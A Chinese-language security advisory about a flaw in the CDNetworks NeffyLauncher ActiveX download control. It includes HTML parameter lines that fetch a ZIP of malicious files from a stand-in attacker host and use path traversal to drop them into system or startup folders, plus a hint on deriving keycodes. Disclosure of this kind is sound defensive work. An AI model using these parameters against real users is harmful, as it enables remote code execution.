受影响系统:
CDNetworks NeffyLauncher 1.0.5
描述:
CDNetworks是亚洲最大的CDN服务供应商,提供各种在线游戏和视频服务。
CDNetworks所提供的ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞控制用户系统。
Neffycient Download(NeffyLauncher.dll,AA07EBD2-EBDD-4BD6-9F8F-114BD513492C)是CDNetworks所提供的ActiveX控件,用于通过HTTP、FTP等下载和升级游戏安装文件。如果用户对使用该控件站点的版面拥有写权限的话,或获得了有效的keycode的话,就可以修改HttpSkin、SkinPath的值。站点上的恶意文件必须压缩为ZIP文件,例如,以下修改可以将恶意文件拷贝到Windows的根目录:
<PARAM NAME="HttpSkin" VALUE="http://www.attacker.com/maliciousFiles.zip">
<PARAM NAME="SkinPath" VALUE="../../../../">
这样攻击者就可以将SkinPath的值修改为所有用户的开始程序文件夹,当用户启动计算机时就会执行恶意程序。
攻击者还可以通过调试这个ActiveX控件来生成keycode值。keycode值的前两个数字代表域的长度(16进制),接下来的5个(或更多)数字用于计算域。
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.cdnetworks.com/
更多内容请看路由安全配置专题、系统安全设置、配置安全的操作系统专题,或进入讨论组讨论。
相关图文阅读
频道图文推荐
健 康 咨 询
时 尚 咨 询
相关专题
- “机器狗”作者浮出水面 藐视法律出售病毒 (184次浏览)
- 黑客炫耀“免杀”技术 专家称已有破解方法 (109次浏览)
- 机器狗太疯狂,作者疑似河南人? (44次浏览)
- Microsoft Internet Explorer FTP含命令注入 (33次浏览)
- RealPlayer再曝新漏洞 (29次浏览)
- 警告:发现恶意木马程序将导致无法使用IE (28次浏览)
- 勤奋作者2天更新一次 病毒清除遇难题 (28次浏览)
- VMware高危漏洞竟能危及真实系统安全 (23次浏览)
- RealPlayer rmoc3260.dll ActiveX含内存破坏 (23次浏览)
- 电脑病毒假冒百度IM肆机偷窥用户隐私 (20次浏览)
